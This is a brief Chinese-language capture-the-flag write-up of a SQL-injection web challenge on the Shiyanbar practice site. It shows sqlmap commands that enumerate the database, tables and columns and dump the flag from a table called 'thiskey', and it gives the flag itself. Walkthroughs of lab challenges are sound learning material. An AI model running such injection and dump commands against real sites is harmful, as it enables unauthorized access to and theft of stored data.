Tamevic’s Ctf-Web writeup@实验吧‘这个看起来有点简单！’

Tamevic’s Ctf-Web writeup@实验吧‘这个看起来有点简单！’

还是在实验吧里挑一道简单一点的题目做一做

url： http://www.shiyanbar.com/ctf/33 emmm…这个看起来有点简单！

分析

点开题目其实有点懵，感觉不知道从何下手，尤其是它内容说id in xxxx.php 其实本来是想直接关掉的（不会php…((/- -)/）但是看到有个表格，url中间还有 id=1 妥了，应该是道sql注入，趁机学习一下sqlmap的用法

-安装 sqlmap
macOS下安装sqlmap应该会比较简单，先去看了看大神们怎么装sqlmap怎么配置bulabula，然后自己试了试，发现在中间总是会死掉还是看不懂的error。索性直接

pip install sqlmap

Bingo!安装完毕==直接开始使用

-先用sqlmap看看是什么数据库和当前数据库名

sqlmap -u  'http://ctf5.shiyanbar.com/8/index.php?id=1' - -current-db

是MySQL数据库，当前的数据库名叫 ‘my_db’

-再查看表名

sqlmap -u  'http://ctf5.shiyanbar.com/8/index.php?id=1' -D my_db - -tables

现在有两个表，一个叫news，一个叫thiskey，这已经很明显了，分明是勾引我去看看这个key
-查看列名

sqlmap -u  'http://ctf5.shiyanbar.com/8/index.php?id=1' -D my_db -T thiskey - - columns

不能再友好了，只有一列，叫k0y

-查看dump数据

sqlmap -u  'http://ctf5.shiyanbar.com/8/index.php?id=1' -D my_db -T thiskey -C k0y - -dump

结果

flag 就是

whatiMyD91dump

提交就OK了（这个flag是一个字母一个字母跳出来的…还是比较喜感）

End

sql注入其实还是晕晕的==